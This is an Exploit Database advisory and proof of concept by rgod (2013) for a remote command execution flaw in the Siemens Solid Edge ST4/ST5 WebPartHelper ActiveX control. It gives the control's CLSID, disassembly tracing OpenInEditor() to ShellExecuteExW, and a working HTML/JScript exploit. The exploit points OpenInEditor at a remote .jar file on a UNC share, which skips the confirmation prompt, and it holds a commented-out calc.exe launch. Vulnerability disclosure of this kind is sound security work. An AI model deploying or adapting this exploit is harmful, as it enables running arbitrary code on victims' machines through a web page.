SIEMENS Solid Edge ST4/ST5 WebPartHelper – ActiveX RFMSsvs!JShellExecuteEx Remote Code Execution

• Exploit Database
• 12 阅读

• 作者： rgod
  日期： 2013-05-26
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/25713/

• SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX Control 
  RFMSsvs!JShellExecuteEx Remote Command Execution 
  
  Tested against: Microsoft Windows Server 2003 r2 sp2
  Microsoft Windows XP sp3
  Microsoft Windows 7
  Internet Explorer 8
  
  Software description: http://en.wikipedia.org/wiki/Solid_Edge
  
  vendor site: http://www.siemens.com/entry/cc/en/
  
  Download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm
  
  File tested: SolidEdgeV104ENGLISH_32Bit.exe
  
  Background:
  
  The mentioned software installs an ActiveX control with 
  the following settings:
  
  CLSID: {DD568718-FF20-48EA-973F-0BD5C9FCA522}
  Progid: SolidEdge.WebPartHelper.1
  Binary Path: C:\Program Files\Solid Edge ST4\Program\WPHelper.dll
  Implements IObjectSafety: True
  Safe For Initialization (IObjectSafety): False
  Safe For Scripting (IObjectSafety): True
  
  This control *implements* IObjectSafety: IE will query through the IObjectSafety
  interface for "Safe for Initialization with data" and "Safe For Scripting".
  
  According to IObjectSafety interface, this control is Safe for Scripting 
  then IEwill allow scripting of this control according to browser
  security settings.
  
  vulnerability:
  
  the WebPartHelper Class offers the OpenInEditor() method, see typelib:
  
  ...
  /* DISPID=8 */
  function OpenInEditor(
  /* VT_VARIANT [12] [in] */ $URL
  )
  {
  }
  ...
  
  By passing an null session share path to the URL argument of this method
  is possible to launch an arbitrary executable.
  
  This is because of a ShellExecuteExW() call inside RFMSsvs.dll
  
  Call stack when ShellExecuteExW() is called:
  
  AddressStackProcedure / arguments Called from Frame
  01B7E140 04AC9F0E SHELL32.ShellExecuteExW RFMSsvs.04AC9F0801B7F280
  01B7F284 022B71AD ? <jmp.&RFMSsvs.JShellExecuteEx>WPHelper.022B71A8 01B7F280
  01B7F560 022B85B6 WPHelper.022B6D70 WPHelper.022B85B1 01B7F55C
  01B7F5D4 022B87A5 ? WPHelper.022B8380 WPHelper.022B87A0 01B7F5D0
  01B7F620 022B89CB WPHelper.022B8710 WPHelper.022B89C6 01B7F61C
  01B7F668 7D0E5186 Includes WPHelper.022B89CBOLEAUT32.7D0E5184 01B7F664
  01B7F690 7D0F4ACF ? OLEAUT32.DispCallFunc OLEAUT32.7D0F4ACA 01B7F68C
  01B7F720 022B58C3 Includes OLEAUT32.7D0F4ACFWPHelper.022B58C1 01B7F71C
  01B7F748 40302C02 Includes WPHelper.022B58C3jscript.40302BFF01B7F744
  01B7F784 40302B6F jscript.40302B90jscript.40302B6A01B7F780
  01B7F7C0 40302AFA jscript.40302B2Ejscript.40302AF501B7F7BC
  01B7F834 40303555 ? jscript.40302A88jscript.4030355001B7F830
  01B7F878 40301221 jscript.4030122Ajscript.4030121C01B7F874
  01B7F8B8 403011D6 jscript.403011E1jscript.403011D101B7F8B4
  01B7F8DC 4030312D jscript.40301182jscript.4030312801B7F8D8
  
  
  WPHelper.dll:
  ...
  022B718A 899D 74FDFFFFmov dword ptr ss:[ebp-28C],ebx
  022B7190 8D85 D8FDFFFFlea eax,dword ptr ss:[ebp-228]
  022B7196 50 push eax
  022B7197 8D8D 60FDFFFFlea ecx,dword ptr ss:[ebp-2A0]
  022B719D 51 push ecx
  022B719E C785 7CFDFFFF 01>mov dword ptr ss:[ebp-284],1
  022B71A8 E8 ADBB0100call <jmp.&RFMSsvs.JShellExecuteEx>
  ...
  
  
  RFMSsvs.dll:
  ...
  04AC9ECF 8B85 A4EFFFFFmov eax,dword ptr ss:[ebp-105C]
  04AC9ED5 8D8D 4CEFFFFFlea ecx,dword ptr ss:[ebp-10B4]
  04AC9EDB 8946 24mov dword ptr ds:[esi+24],eax
  04AC9EDE FF15 0CE3CB04call dword ptr ds:[<&JUtil.??BGUserText@@QBEPB_WXZ>]; JUtil.??BGUserText@@QBEPB_WXZ
  04AC9EE4 8946 10mov dword ptr ds:[esi+10],eax
  04AC9EE7 C645 FC 02 mov byte ptr ss:[ebp-4],2
  04AC9EEB 8D8D D8EEFFFFlea ecx,dword ptr ss:[ebp-1128]
  04AC9EF1 E8 6A89F1FFcall RFMSsvs.??1JrfmsFileName@@QAE@XZ
  04AC9EF6 EB 0Fjmp short RFMSsvs.04AC9F07
  04AC9EF8 8D8D 84EFFFFFlea ecx,dword ptr ss:[ebp-107C]
  04AC9EFE FF15 0CE3CB04call dword ptr ds:[<&JUtil.??BGUserText@@QBEPB_WXZ>]; JUtil.??BGUserText@@QBEPB_WXZ
  04AC9F04 8946 10mov dword ptr ds:[esi+10],eax; eax -> "\\192.168.2.100\uncshare\CmdExec.jar"
  04AC9F07 56 push esi
  04AC9F08 FF15 E8E6CB04call dword ptr ds:[<&SHELL32.ShellExecuteExW>]; SHELL32.ShellExecuteExW
  ...
  
  As attachment, proof of concept code.
  Note that by pointing OpenInEditor() (and consequently ShellExecuteExW() ) 
  to a remote .jar file as handled in JRE/JDK7u21 is possible to bypass
  the usual confirmation box.
  
  <!--
  SIEMENS Solid Edge WebPartHelper ActiveX Control RFMSsvs!JShellExecuteEx
  Remote Command Execution PoC
  
  CLSID: {DD568718-FF20-48EA-973F-0BD5C9FCA522}
  Progid: SolidEdge.WebPartHelper.1
  Binary Path: C:\Program Files\Solid Edge ST4\Program\WPHelper.dll
  Implements IObjectSafety: True
  Safe For Initialization (IObjectSafety): False
  Safe For Scripting (IObjectSafety): True
  -->
  <!-- saved from url=(0014)about:internet -->
  <html>
  <script>
  
  var obj = new ActiveXObject("SolidEdge.WebPartHelper.1");
   
  //launch calc.exe
  //obj.OpenInEditor("c:\\windows\\system32\\calc.exe");
  
  //bypass the confirmation box, JRE/JDK7u21
  obj.OpenInEditor("\\\\192.168.0.1\\uncshare\\CmdExec.jar");
  
  
  </script>